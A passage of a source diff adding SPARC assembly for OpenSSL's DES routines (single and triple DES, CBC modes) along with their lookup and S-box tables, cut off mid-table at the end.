+	! loads key next encryption/decryption first round from [in3]
+
+	rounds_macro(out5, in5, -1, .des_dec.1, in4, in3, retl)
+
+
+
+! void DES_encrypt1(data, ks, enc)
+! *******************************
+
+	.align 32
+	.global DES_encrypt1
+	.type	 DES_encrypt1,#function
+
+DES_encrypt1:
+
+	save	%sp, FRAME, %sp
+
+	sethi	%hi(.PIC.DES_SPtrans-1f),global1
+	or	global1,%lo(.PIC.DES_SPtrans-1f),global1
+1:	call	.+8
+	add	%o7,global1,global1
+	sub	global1,.PIC.DES_SPtrans-.des_and,out2
+
+	ld	[in0], in5                ! left
+	cmp	in2, 0                    ! enc
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	be,pn	%icc, .encrypt.dec        ! enc/dec
+#else
+	be	.encrypt.dec
+#endif
+	ld	[in0+4], out5             ! right
+
+	! parameter 6  1/2 for include encryption/decryption
+	! parameter 7  1 for move in1 to in3
+	! parameter 8  1 for move in3 to in4, 2 for move in4 to in3
+
+	ip_macro(in5, out5, in5, out5, in3, 0, 1, 1)
+
+	rounds_macro(in5, out5, 1, .des_encrypt1.1, in3, in4) ! in4 not used
+
+	fp_macro(in5, out5, 1)            ! 1 for store to [in0]
+
+	ret
+	restore
+
+.encrypt.dec:
+
+	add	in1, 120, in3             ! use last subkey for first round
+
+	! parameter 6  1/2 for include encryption/decryption
+	! parameter 7  1 for move in1 to in3
+	! parameter 8  1 for move in3 to in4, 2 for move in4 to in3
+
+	ip_macro(in5, out5, out5, in5, in4, 2, 0, 1) ! include dec,  ks in4
+
+	fp_macro(out5, in5, 1)            ! 1 for store to [in0]
+
+	ret
+	restore
+
+.DES_encrypt1.end:
+	.size	 DES_encrypt1,.DES_encrypt1.end-DES_encrypt1
+
+
+! void DES_encrypt2(data, ks, enc)
+!*********************************
+
+	! encrypts/decrypts without initial/final permutation
+
+	.align 32
+	.global DES_encrypt2
+	.type	 DES_encrypt2,#function
+
+DES_encrypt2:
+
+	save	%sp, FRAME, %sp
+
+	sethi	%hi(.PIC.DES_SPtrans-1f),global1
+	or	global1,%lo(.PIC.DES_SPtrans-1f),global1
+1:	call	.+8
+	add	%o7,global1,global1
+	sub	global1,.PIC.DES_SPtrans-.des_and,out2
+
+	! Set sbox address 1 to 6 and rotate halfs 3 left
+	! Errors caught by destest? Yes. Still? *NO*
+
+	!sethi	%hi(DES_SPtrans), global1 ! address sbox 1
+
+	!or	global1, %lo(DES_SPtrans), global1  ! sbox 1
+
+	add	global1, 256, global2     ! sbox 2
+	add	global1, 512, global3     ! sbox 3
+
+	ld	[in0], out5               ! right
+	add	global1, 768, global4     ! sbox 4
+	add	global1, 1024, global5    ! sbox 5
+
+	ld	[in0+4], in5              ! left
+	add	global1, 1280, local6     ! sbox 6
+	add	global1, 1792, out3       ! sbox 8
+
+	! rotate
+
+	sll	in5, 3, local5
+	mov	in1, in3                  ! key address to in3
+
+	sll	out5, 3, local7
+	srl	in5, 29, in5
+
+	srl	out5, 29, out5
+	add	in5, local5, in5
+
+	add	out5, local7, out5
+	cmp	in2, 0
+
+	! we use our own stackframe
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	be,pn	%icc, .encrypt2.dec       ! decryption
+#else
+	be	.encrypt2.dec
+#endif
+	STPTR	in0, [%sp+BIAS+ARG0+0*ARGSZ]
+
+	ld	[in3], out0               ! key 7531 first round
+	mov	LOOPS, out4               ! loop counter
+
+	ld	[in3+4], out1             ! key 8642 first round
+	sethi	%hi(0x0000FC00), local5
+
+	call .des_enc
+	mov	in3, in4
+
+	! rotate
+	sll	in5, 29, in0
+	srl	in5, 3, in5
+	sll	out5, 29, in1
+	add	in5, in0, in5
+	srl	out5, 3, out5
+	LDPTR	[%sp+BIAS+ARG0+0*ARGSZ], in0
+	add	out5, in1, out5
+	st	in5, [in0]
+	st	out5, [in0+4]
+
+	ret
+	restore
+
+
+.encrypt2.dec:
+
+	add in3, 120, in4
+
+	ld	[in4], out0               ! key 7531 first round
+	mov	LOOPS, out4               ! loop counter
+
+	ld	[in4+4], out1             ! key 8642 first round
+	sethi	%hi(0x0000FC00), local5
+
+	mov	in5, local1               ! left expected in out5
+	mov	out5, in5
+
+	call .des_dec
+	mov	local1, out5
+
+.encrypt2.finish:
+
+	! rotate
+	sll	in5, 29, in0
+	srl	in5, 3, in5
+	sll	out5, 29, in1
+	add	in5, in0, in5
+	srl	out5, 3, out5
+	LDPTR	[%sp+BIAS+ARG0+0*ARGSZ], in0
+	add	out5, in1, out5
+	st	out5, [in0]
+	st	in5, [in0+4]
+
+	ret
+	restore
+
+.DES_encrypt2.end:
+	.size	 DES_encrypt2, .DES_encrypt2.end-DES_encrypt2
+
+
+! void DES_encrypt3(data, ks1, ks2, ks3)
+! **************************************
+
+	.align 32
+	.global DES_encrypt3
+	.type	 DES_encrypt3,#function
+
+DES_encrypt3:
+
+	save	%sp, FRAME, %sp
+	
+	sethi	%hi(.PIC.DES_SPtrans-1f),global1
+	or	global1,%lo(.PIC.DES_SPtrans-1f),global1
+1:	call	.+8
+	add	%o7,global1,global1
+	sub	global1,.PIC.DES_SPtrans-.des_and,out2
+
+	ld	[in0], in5                ! left
+	add	in2, 120, in4             ! ks2
+
+	ld	[in0+4], out5             ! right
+	mov	in3, in2                  ! save ks3
+
+	! parameter 6  1/2 for include encryption/decryption
+	! parameter 7  1 for mov in1 to in3
+	! parameter 8  1 for mov in3 to in4
+	! parameter 9  1 for load ks3 and ks2 to in4 and in3
+
+	ip_macro(in5, out5, in5, out5, in3, 1, 1, 0, 0)
+
+	call	.des_dec
+	mov	in2, in3                  ! preload ks3
+
+	call	.des_enc
+	nop
+
+	fp_macro(in5, out5, 1)
+
+	ret
+	restore
+
+.DES_encrypt3.end:
+	.size	 DES_encrypt3,.DES_encrypt3.end-DES_encrypt3
+
+
+! void DES_decrypt3(data, ks1, ks2, ks3)
+! **************************************
+
+	.align 32
+	.global DES_decrypt3
+	.type	 DES_decrypt3,#function
+
+DES_decrypt3:
+
+	save	%sp, FRAME, %sp
+	
+	sethi	%hi(.PIC.DES_SPtrans-1f),global1
+	or	global1,%lo(.PIC.DES_SPtrans-1f),global1
+1:	call	.+8
+	add	%o7,global1,global1
+	sub	global1,.PIC.DES_SPtrans-.des_and,out2
+
+	ld	[in0], in5                ! left
+	add	in3, 120, in4             ! ks3
+
+	ld	[in0+4], out5             ! right
+	mov	in2, in3                  ! ks2
+
+	! parameter 6  1/2 for include encryption/decryption
+	! parameter 7  1 for mov in1 to in3
+	! parameter 8  1 for mov in3 to in4
+	! parameter 9  1 for load ks3 and ks2 to in4 and in3
+
+	ip_macro(in5, out5, out5, in5, in4, 2, 0, 0, 0)
+
+	call	.des_enc
+	add	in1, 120, in4             ! preload ks1
+
+	call	.des_dec
+	nop
+
+	fp_macro(out5, in5, 1)
+
+	ret
+	restore
+
+.DES_decrypt3.end:
+	.size	 DES_decrypt3,.DES_decrypt3.end-DES_decrypt3
+
+! void DES_ncbc_encrypt(input, output, length, schedule, ivec, enc)
+! *****************************************************************
+
+
+	.align 32
+	.global DES_ncbc_encrypt
+	.type	 DES_ncbc_encrypt,#function
+
+DES_ncbc_encrypt:
+
+	save	%sp, FRAME, %sp
+	
+	define({INPUT},  { [%sp+BIAS+ARG0+0*ARGSZ] })
+	define({OUTPUT}, { [%sp+BIAS+ARG0+1*ARGSZ] })
+	define({IVEC},   { [%sp+BIAS+ARG0+4*ARGSZ] })
+
+	sethi	%hi(.PIC.DES_SPtrans-1f),global1
+	or	global1,%lo(.PIC.DES_SPtrans-1f),global1
+1:	call	.+8
+	add	%o7,global1,global1
+	sub	global1,.PIC.DES_SPtrans-.des_and,out2
+
+	cmp	in5, 0                    ! enc   
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	be,pn	%icc, .ncbc.dec
+#else
+	be	.ncbc.dec
+#endif
+	STPTR	in4, IVEC
+
+	! addr  left  right  temp  label
+	load_little_endian(in4, in5, out5, local3, .LLE1)  ! iv
+
+	addcc	in2, -8, in2              ! bytes missing when first block done
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bl,pn	%icc, .ncbc.enc.seven.or.less
+#else
+	bl	.ncbc.enc.seven.or.less
+#endif
+	mov	in3, in4                  ! schedule
+
+.ncbc.enc.next.block:
+
+	load_little_endian(in0, out4, global4, local3, .LLE2)  ! block
+
+.ncbc.enc.next.block_1:
+
+	xor	in5, out4, in5            ! iv xor
+	xor	out5, global4, out5       ! iv xor
+
+	! parameter 8  1 for move in3 to in4, 2 for move in4 to in3
+	ip_macro(in5, out5, in5, out5, in3, 0, 0, 2)
+
+.ncbc.enc.next.block_2:
+
+!//	call .des_enc                     ! compares in2 to 8
+!	rounds inlined for alignment purposes
+
+	add	global1, 768, global4     ! address sbox 4 since register used below
+
+	rounds_macro(in5, out5, 1, .ncbc.enc.1, in3, in4) ! include encryption  ks in3
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bl,pn	%icc, .ncbc.enc.next.block_fp
+#else
+	bl	.ncbc.enc.next.block_fp
+#endif
+	add	in0, 8, in0               ! input address
+
+	! If 8 or more bytes are to be encrypted after this block,
+	! we combine final permutation for this block with initial
+	! permutation for next block. Load next block:
+
+	load_little_endian(in0, global3, global4, local5, .LLE12)
+
+	!  parameter 1   original left
+	!  parameter 2   original right
+	!  parameter 3   left ip
+	!  parameter 4   right ip
+	!  parameter 5   1: load ks1/ks2 to in3/in4, add 120 to in4
+	!                2: mov in4 to in3
+	!
+	! also adds -8 to length in2 and loads loop counter to out4
+
+	fp_ip_macro(out0, out1, global3, global4, 2)
+
+	store_little_endian(in1, out0, out1, local3, .SLE10)  ! block
+
+	ld	[in3], out0               ! key 7531 first round next block
+	mov 	in5, local1
+	xor	global3, out5, in5        ! iv xor next block
+
+	ld	[in3+4], out1             ! key 8642
+	add	global1, 512, global3     ! address sbox 3 since register used
+	xor	global4, local1, out5     ! iv xor next block
+
+	ba	.ncbc.enc.next.block_2
+	add	in1, 8, in1               ! output adress
+
+.ncbc.enc.next.block_fp:
+
+	fp_macro(in5, out5)
+
+	store_little_endian(in1, in5, out5, local3, .SLE1)  ! block
+
+	addcc   in2, -8, in2              ! bytes missing when next block done
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bpos,pt	%icc, .ncbc.enc.next.block  ! also jumps if 0
+#else
+	bpos	.ncbc.enc.next.block
+#endif
+	add	in1, 8, in1
+
+.ncbc.enc.seven.or.less:
+
+	cmp	in2, -8
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	ble,pt	%icc, .ncbc.enc.finish
+#else
+	ble	.ncbc.enc.finish
+#endif
+	nop
+
+	add	in2, 8, local1            ! bytes to load
+
+	! addr, length, dest left, dest right, temp, temp2, label, ret label
+	load_n_bytes(in0, local1, global4, out4, local2, local3, .LNB1, .ncbc.enc.next.block_1)
+
+	! Loads 1 to 7 bytes little endian to global4, out4
+
+
+.ncbc.enc.finish:
+
+	LDPTR	IVEC, local4
+	store_little_endian(local4, in5, out5, local5, .SLE2)  ! ivec
+
+	ret
+	restore
+
+
+.ncbc.dec:
+
+	STPTR	in0, INPUT
+	cmp	in2, 0                    ! length
+	add	in3, 120, in3
+
+	LDPTR	IVEC, local7              ! ivec
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	ble,pn	%icc, .ncbc.dec.finish
+#else
+	ble	.ncbc.dec.finish
+#endif
+	mov	in3, in4                  ! schedule
+
+	STPTR	in1, OUTPUT
+	mov	in0, local5               ! input
+
+	load_little_endian(local7, in0, in1, local3, .LLE3)   ! ivec
+
+.ncbc.dec.next.block:
+
+	load_little_endian(local5, in5, out5, local3, .LLE4)  ! block
+
+	! parameter 6  1/2 for include encryption/decryption
+	! parameter 7  1 for mov in1 to in3
+	! parameter 8  1 for mov in3 to in4
+
+	ip_macro(in5, out5, out5, in5, in4, 2, 0, 1) ! include decryprion  ks in4
+
+	fp_macro(out5, in5, 0, 1) ! 1 for input and output address to local5/7
+
+	! in2 is bytes left to be stored
+	! in2 is compared to 8 in the rounds
+
+	xor	out5, in0, out4           ! iv xor
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bl,pn	%icc, .ncbc.dec.seven.or.less
+#else
+	bl	.ncbc.dec.seven.or.less
+#endif
+	xor	in5, in1, global4         ! iv xor
+
+	! Load ivec next block now, since input and output address might be the same.
+
+	load_little_endian_inc(local5, in0, in1, local3, .LLE5)  ! iv
+
+	store_little_endian(local7, out4, global4, local3, .SLE3)
+
+	STPTR	local5, INPUT
+	add	local7, 8, local7
+	addcc   in2, -8, in2
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bg,pt	%icc, .ncbc.dec.next.block
+#else
+	bg	.ncbc.dec.next.block
+#endif
+	STPTR	local7, OUTPUT
+
+
+.ncbc.dec.store.iv:
+
+	LDPTR	IVEC, local4              ! ivec
+	store_little_endian(local4, in0, in1, local5, .SLE4)
+
+.ncbc.dec.finish:
+
+	ret
+	restore
+
+.ncbc.dec.seven.or.less:
+
+	load_little_endian_inc(local5, in0, in1, local3, .LLE13)     ! ivec
+
+	store_n_bytes(local7, in2, global4, out4, local3, local4, .SNB1, .ncbc.dec.store.iv)
+
+
+.DES_ncbc_encrypt.end:
+	.size	 DES_ncbc_encrypt, .DES_ncbc_encrypt.end-DES_ncbc_encrypt
+
+
+! void DES_ede3_cbc_encrypt(input, output, lenght, ks1, ks2, ks3, ivec, enc)
+! **************************************************************************
+
+
+	.align 32
+	.global DES_ede3_cbc_encrypt
+	.type	 DES_ede3_cbc_encrypt,#function
+
+DES_ede3_cbc_encrypt:
+
+	save	%sp, FRAME, %sp
+
+	define({KS1}, { [%sp+BIAS+ARG0+3*ARGSZ] })
+	define({KS2}, { [%sp+BIAS+ARG0+4*ARGSZ] })
+	define({KS3}, { [%sp+BIAS+ARG0+5*ARGSZ] })
+
+	sethi	%hi(.PIC.DES_SPtrans-1f),global1
+	or	global1,%lo(.PIC.DES_SPtrans-1f),global1
+1:	call	.+8
+	add	%o7,global1,global1
+	sub	global1,.PIC.DES_SPtrans-.des_and,out2
+
+	LDPTR	[%fp+BIAS+ARG0+7*ARGSZ], local3          ! enc
+	LDPTR	[%fp+BIAS+ARG0+6*ARGSZ], local4          ! ivec
+	cmp	local3, 0                 ! enc
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	be,pn	%icc, .ede3.dec
+#else
+	be	.ede3.dec
+#endif
+	STPTR	in4, KS2
+
+	STPTR	in5, KS3
+
+	load_little_endian(local4, in5, out5, local3, .LLE6)  ! ivec
+
+	addcc	in2, -8, in2              ! bytes missing after next block
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bl,pn	%icc,  .ede3.enc.seven.or.less
+#else
+	bl	.ede3.enc.seven.or.less
+#endif
+	STPTR	in3, KS1
+
+.ede3.enc.next.block:
+
+	load_little_endian(in0, out4, global4, local3, .LLE7)
+
+.ede3.enc.next.block_1:
+
+	LDPTR	KS2, in4
+	xor	in5, out4, in5            ! iv xor
+	xor	out5, global4, out5       ! iv xor
+
+	LDPTR	KS1, in3
+	add	in4, 120, in4             ! for decryption we use last subkey first
+	nop
+
+	ip_macro(in5, out5, in5, out5, in3)
+
+.ede3.enc.next.block_2:
+
+	call .des_enc                     ! ks1 in3
+	nop
+
+	call .des_dec                     ! ks2 in4
+	LDPTR	KS3, in3
+
+	call .des_enc                     ! ks3 in3  compares in2 to 8
+	nop
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bl,pn	%icc, .ede3.enc.next.block_fp
+#else
+	bl	.ede3.enc.next.block_fp
+#endif
+	add	in0, 8, in0
+
+	! If 8 or more bytes are to be encrypted after this block,
+	! we combine final permutation for this block with initial
+	! permutation for next block. Load next block:
+
+	load_little_endian(in0, global3, global4, local5, .LLE11)
+
+	!  parameter 1   original left
+	!  parameter 2   original right
+	!  parameter 3   left ip
+	!  parameter 4   right ip
+	!  parameter 5   1: load ks1/ks2 to in3/in4, add 120 to in4
+	!                2: mov in4 to in3
+	!
+	! also adds -8 to length in2 and loads loop counter to out4
+
+	fp_ip_macro(out0, out1, global3, global4, 1)
+
+	store_little_endian(in1, out0, out1, local3, .SLE9)  ! block
+
+	mov 	in5, local1
+	xor	global3, out5, in5        ! iv xor next block
+
+	ld	[in3], out0               ! key 7531
+	add	global1, 512, global3     ! address sbox 3
+	xor	global4, local1, out5     ! iv xor next block
+
+	ld	[in3+4], out1             ! key 8642
+	add	global1, 768, global4     ! address sbox 4
+	ba	.ede3.enc.next.block_2
+	add	in1, 8, in1
+
+.ede3.enc.next.block_fp:
+
+	fp_macro(in5, out5)
+
+	store_little_endian(in1, in5, out5, local3, .SLE5)  ! block
+
+	addcc   in2, -8, in2              ! bytes missing when next block done
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bpos,pt	%icc, .ede3.enc.next.block
+#else
+	bpos	.ede3.enc.next.block
+#endif
+	add	in1, 8, in1
+
+.ede3.enc.seven.or.less:
+
+	cmp	in2, -8
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	ble,pt	%icc, .ede3.enc.finish
+#else
+	ble	.ede3.enc.finish
+#endif
+	nop
+
+	add	in2, 8, local1            ! bytes to load
+
+	! addr, length, dest left, dest right, temp, temp2, label, ret label
+	load_n_bytes(in0, local1, global4, out4, local2, local3, .LNB2, .ede3.enc.next.block_1)
+
+.ede3.enc.finish:
+
+	LDPTR	[%fp+BIAS+ARG0+6*ARGSZ], local4          ! ivec
+	store_little_endian(local4, in5, out5, local5, .SLE6)  ! ivec
+
+	ret
+	restore
+
+.ede3.dec:
+
+	STPTR	in0, INPUT
+	add	in5, 120, in5
+
+	STPTR	in1, OUTPUT
+	mov	in0, local5
+	add	in3, 120, in3
+
+	STPTR	in3, KS1
+	cmp	in2, 0
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	ble	%icc, .ede3.dec.finish
+#else
+	ble	.ede3.dec.finish
+#endif
+	STPTR	in5, KS3
+
+	LDPTR	[%fp+BIAS+ARG0+6*ARGSZ], local7          ! iv
+	load_little_endian(local7, in0, in1, local3, .LLE8)
+
+.ede3.dec.next.block:
+
+	load_little_endian(local5, in5, out5, local3, .LLE9)
+
+	! parameter 6  1/2 for include encryption/decryption
+	! parameter 7  1 for mov in1 to in3
+	! parameter 8  1 for mov in3 to in4
+	! parameter 9  1 for load ks3 and ks2 to in4 and in3
+
+	ip_macro(in5, out5, out5, in5, in4, 2, 0, 0, 1) ! inc .des_dec ks3 in4
+
+	call .des_enc                     ! ks2 in3
+	LDPTR	KS1, in4
+
+	call .des_dec                     ! ks1 in4
+	nop
+
+	fp_macro(out5, in5, 0, 1)   ! 1 for input and output address local5/7
+
+	! in2 is bytes left to be stored
+	! in2 is compared to 8 in the rounds
+
+	xor	out5, in0, out4
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bl,pn	%icc, .ede3.dec.seven.or.less
+#else
+	bl	.ede3.dec.seven.or.less
+#endif
+	xor	in5, in1, global4
+
+	load_little_endian_inc(local5, in0, in1, local3, .LLE10)   ! iv next block
+
+	store_little_endian(local7, out4, global4, local3, .SLE7)  ! block
+
+	STPTR	local5, INPUT
+	addcc   in2, -8, in2
+	add	local7, 8, local7
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bg,pt	%icc, .ede3.dec.next.block
+#else
+	bg	.ede3.dec.next.block
+#endif
+	STPTR	local7, OUTPUT
+
+.ede3.dec.store.iv:
+
+	LDPTR	[%fp+BIAS+ARG0+6*ARGSZ], local4          ! ivec
+	store_little_endian(local4, in0, in1, local5, .SLE8)  ! ivec
+
+.ede3.dec.finish:
+
+	ret
+	restore
+
+.ede3.dec.seven.or.less:
+
+	load_little_endian_inc(local5, in0, in1, local3, .LLE14)     ! iv
+
+	store_n_bytes(local7, in2, global4, out4, local3, local4, .SNB2, .ede3.dec.store.iv)
+
+
+.DES_ede3_cbc_encrypt.end:
+	.size	 DES_ede3_cbc_encrypt,.DES_ede3_cbc_encrypt.end-DES_ede3_cbc_encrypt
+
+	.align	256
+	.type	 .des_and,#object
+	.size	 .des_and,284
+
+.des_and:
+
+! This table is used for AND 0xFC when it is known that register
+! bits 8-31 are zero. Makes it possible to do three arithmetic
+! operations in one cycle.
+
+	.byte  0, 0, 0, 0, 4, 4, 4, 4
+	.byte  8, 8, 8, 8, 12, 12, 12, 12
+	.byte  16, 16, 16, 16, 20, 20, 20, 20
+	.byte  24, 24, 24, 24, 28, 28, 28, 28
+	.byte  32, 32, 32, 32, 36, 36, 36, 36
+	.byte  40, 40, 40, 40, 44, 44, 44, 44
+	.byte  48, 48, 48, 48, 52, 52, 52, 52
+	.byte  56, 56, 56, 56, 60, 60, 60, 60
+	.byte  64, 64, 64, 64, 68, 68, 68, 68
+	.byte  72, 72, 72, 72, 76, 76, 76, 76
+	.byte  80, 80, 80, 80, 84, 84, 84, 84
+	.byte  88, 88, 88, 88, 92, 92, 92, 92
+	.byte  96, 96, 96, 96, 100, 100, 100, 100
+	.byte  104, 104, 104, 104, 108, 108, 108, 108
+	.byte  112, 112, 112, 112, 116, 116, 116, 116
+	.byte  120, 120, 120, 120, 124, 124, 124, 124
+	.byte  128, 128, 128, 128, 132, 132, 132, 132
+	.byte  136, 136, 136, 136, 140, 140, 140, 140
+	.byte  144, 144, 144, 144, 148, 148, 148, 148
+	.byte  152, 152, 152, 152, 156, 156, 156, 156
+	.byte  160, 160, 160, 160, 164, 164, 164, 164
+	.byte  168, 168, 168, 168, 172, 172, 172, 172
+	.byte  176, 176, 176, 176, 180, 180, 180, 180
+	.byte  184, 184, 184, 184, 188, 188, 188, 188
+	.byte  192, 192, 192, 192, 196, 196, 196, 196
+	.byte  200, 200, 200, 200, 204, 204, 204, 204
+	.byte  208, 208, 208, 208, 212, 212, 212, 212
+	.byte  216, 216, 216, 216, 220, 220, 220, 220
+	.byte  224, 224, 224, 224, 228, 228, 228, 228
+	.byte  232, 232, 232, 232, 236, 236, 236, 236
+	.byte  240, 240, 240, 240, 244, 244, 244, 244
+	.byte  248, 248, 248, 248, 252, 252, 252, 252
+
+	! 5 numbers for initil/final permutation
+
+	.word   0x0f0f0f0f                ! offset 256
+	.word	0x0000ffff                ! 260
+	.word	0x33333333                ! 264
+	.word	0x00ff00ff                ! 268
+	.word	0x55555555                ! 272
+
+	.word	0                         ! 276
+	.word	LOOPS                     ! 280
+	.word	0x0000FC00                ! 284
+
+	.global	DES_SPtrans
+	.type	DES_SPtrans,#object
+	.size	DES_SPtrans,2048
+.align	64
+DES_SPtrans:
+.PIC.DES_SPtrans:
+	! nibble 0
+	.word	0x02080800, 0x00080000, 0x02000002, 0x02080802
+	.word	0x02000000, 0x00080802, 0x00080002, 0x02000002
+	.word	0x00080802, 0x02080800, 0x02080000, 0x00000802
+	.word	0x02000802, 0x02000000, 0x00000000, 0x00080002
+	.word	0x00080000, 0x00000002, 0x02000800, 0x00080800
+	.word	0x02080802, 0x02080000, 0x00000802, 0x02000800
+	.word	0x00000002, 0x00000800, 0x00080800, 0x02080002
+	.word	0x00000800, 0x02000802, 0x02080002, 0x00000000
+	.word	0x00000000, 0x02080802, 0x02000800, 0x00080002
+	.word	0x02080800, 0x00080000, 0x00000802, 0x02000800
+	.word	0x02080002, 0x00000800, 0x00080800, 0x02000002
+	.word	0x00080802, 0x00000002, 0x02000002, 0x02080000
+	.word	0x02080802, 0x00080800, 0x02080000, 0x02000802
+	.word	0x02000000, 0x00000802, 0x00080002, 0x00000000
+	.word	0x00080000, 0x02000000, 0x02000802, 0x02080800
+	.word	0x00000002, 0x02080002, 0x00000800, 0x00080802
+	! nibble 1
+	.word	0x40108010, 0x00000000, 0x00108000, 0x40100000
+	.word	0x40000010, 0x00008010, 0x40008000, 0x00108000
+	.word	0x00008000, 0x40100010, 0x00000010, 0x40008000
+	.word	0x00100010, 0x40108000, 0x40100000, 0x00000010
+	.word	0x00100000, 0x40008010, 0x40100010, 0x00008000
+	.word	0x00108010, 0x40000000, 0x00000000, 0x00100010
+	.word	0x40008010, 0x00108010, 0x40108000, 0x40000010
+	.word	0x40000000, 0x00100000, 0x00008010, 0x40108010
+	.word	0x00100010, 0x40108000, 0x40008000, 0x00108010
+	.word	0x40108010, 0x00100010, 0x40000010, 0x00000000
+	.word	0x40000000, 0x00008010, 0x00100000, 0x40100010
+	.word	0x00008000, 0x40000000, 0x00108010, 0x40008010
+	.word	0x40108000, 0x00008000, 0x00000000, 0x40000010
+	.word	0x00000010, 0x40108010, 0x00108000, 0x40100000
+	.word	0x40100010, 0x00100000, 0x00008010, 0x40008000
+	.word	0x40008010, 0x00000010, 0x40100000, 0x00108000
+	! nibble 2
+	.word	0x04000001, 0x04040100, 0x00000100, 0x04000101
+	.word	0x00040001, 0x04000000, 0x04000101, 0x00040100
+	.word	0x04000100, 0x00040000, 0x04040000, 0x00000001
+	.word	0x04040101, 0x00000101, 0x00000001, 0x04040001
+	.word	0x00000000, 0x00040001, 0x04040100, 0x00000100
+	.word	0x00000101, 0x04040101, 0x00040000, 0x04000001
+	.word	0x04040001, 0x04000100, 0x00040101, 0x04040000
+	.word	0x00040100, 0x00000000, 0x04000000, 0x00040101
+	.word	0x04040100, 0x00000100, 0x00000001, 0x00040000
+	.word	0x00000101, 0x00040001, 0x04040000, 0x04000101
+	.word	0x00000000, 0x04040100, 0x00040100, 0x04040001
+	.word	0x00040001, 0x04000000, 0x04040101, 0x00000001
+	.word	0x00040101, 0x04000001, 0x04000000, 0x04040101
+	.word	0x00040000, 0x04000100, 0x04000101, 0x00040100
+	.word	0x04000100, 0x00000000, 0x04040001, 0x00000101
+	.word	0x04000001, 0x00040101, 0x00000100, 0x04040000
+	! nibble 3
+	.word	0x00401008, 0x10001000, 0x00000008, 0x10401008
+	.word	0x00000000, 0x10400000, 0x10001008, 0x00400008
+	.word	0x10401000, 0x10000008, 0x10000000, 0x00001008
+	.word	0x10000008, 0x00401008, 0x00400000, 0x10000000
+	.word	0x10400008, 0x00401000, 0x00001000, 0x00000008
+	.word	0x00401000, 0x10001008, 0x10400000, 0x00001000
+	.word	0x00001008, 0x00000000, 0x00400008, 0x10401000
+	.word	0x10001000, 0x10400008, 0x10401008, 0x00400000
+	.word	0x10400008, 0x00001008, 0x00400000, 0x10000008
+	.word	0x00401000, 0x10001000, 0x00000008, 0x10400000
+	.word	0x10001008, 0x00000000, 0x00001000, 0x00400008
+	.word	0x00000000, 0x10400008, 0x10401000, 0x00001000
+	.word	0x10000000, 0x10401008, 0x00401008, 0x00400000
+	.word	0x10401008, 0x00000008, 0x10001000, 0x00401008
+	.word	0x00400008, 0x00401000, 0x10400000, 0x10001008
+	.word	0x00001008, 0x10000000, 0x10000008, 0x10401000
+	! nibble 4
+	.word	0x08000000, 0x00010000, 0x00000400, 0x08010420
+	.word	0x08010020, 0x08000400, 0x00010420, 0x08010000
+	.word	0x00010000, 0x00000020, 0x08000020, 0x00010400
+	.word	0x08000420, 0x08010020, 0x08010400, 0x00000000
+	.word	0x00010400, 0x08000000, 0x00010020, 0x00000420
+	.word	0x08000400, 0x00010420, 0x00000000, 0x08000020
+	.word	0x00000020, 0x08000420, 0x08010420, 0x00010020
+	.word	0x08010000, 0x00000400, 0x00000420, 0x08010400
+	.word	0x08010400, 0x08000420, 0x00010020, 0x08010000
+	.word	0x00010000, 0x00000020, 0x08000020, 0x08000400
+	.word	0x08000000, 0x00010400, 0x08010420, 0x00000000
+	.word	0x00010420, 0x08000000, 0x00000400, 0x00010020
+	.word	0x08000420, 0x00000400, 0x00000000, 0x08010420
+	.word	0x08010020, 0x08010400, 0x00000420, 0x00010000
+	.word	0x00010400, 0x08010020, 0x08000400, 0x00000420
+	.word	0x00000020, 0x00010420, 0x08010000, 0x08000020
+	! nibble 5
+	.word	0x80000040, 0x00200040, 0x00000000, 0x80202000
+	.word	0x00200040, 0x00002000, 0x80002040, 0x00200000
+	.word	0x00002040, 0x80202040, 0x00202000, 0x80000000
+	.word	0x80002000, 0x80000040, 0x80200000, 0x00202040
+	.word	0x00200000, 0x80002040, 0x80200040, 0x00000000
+	.word	0x00002000, 0x00000040, 0x80202000, 0x80200040
+	.word	0x80202040, 0x80200000, 0x80000000, 0x00002040
+	.word	0x00000040, 0x00202000, 0x00202040, 0x80002000
+	.word	0x00002040, 0x80000000, 0x80002000, 0x00202040
+	.word	0x80202000, 0x00200040, 0x00000000, 0x80002000
+	.word	0x80000000, 0x00002000, 0x80200040, 0x00200000
+	.word	0x00200040, 0x80202040, 0x00202000, 0x00000040
+	.word	0x80202040, 0x00202000, 0x00200000, 0x80002040
+	.word	0x80000040, 0x80200000, 0x00202040, 0x00000000
+	.word	0x00002000, 0x80000040, 0x80002040, 0x80202000
+	.word	0x80200000, 0x00002040, 0x00000040, 0x80200040
+	! nibble 6
+	.word	0x00004000, 0x00000200, 0x01000200, 0x01000004
+	.word	0x01004204, 0x00004004, 0x00004200, 0x00000000
+	.word	0x01000000, 0x01000204, 0x00000204, 0x01004000
+	.word	0x00000004, 0x01004200, 0x01004000, 0x00000204
+	.word	0x01000204, 0x00004000, 0x00004004, 0x01004204
+	.word	0x00000000, 0x01000200, 0x01000004, 0x00004200
+	.word	0x01004004, 0x00004204, 0x01004200, 0x00000004
+	.word	0x00004204, 0x01004004, 0x00000200, 0x01000000
+	.word	0x00004204, 0x01004000, 0x01004004, 0x00000204
+	.word	0x00004000, 0x00000200, 0x01000000, 0x01004004
+	.word	0x01000204, 0x00004204, 0x00004200, 0x00000000
+	.word	0x00000200, 0x01000004, 0x00000004, 0x01000200
+	.word	0x00000000, 0x01000204, 0x01000200, 0x00004200
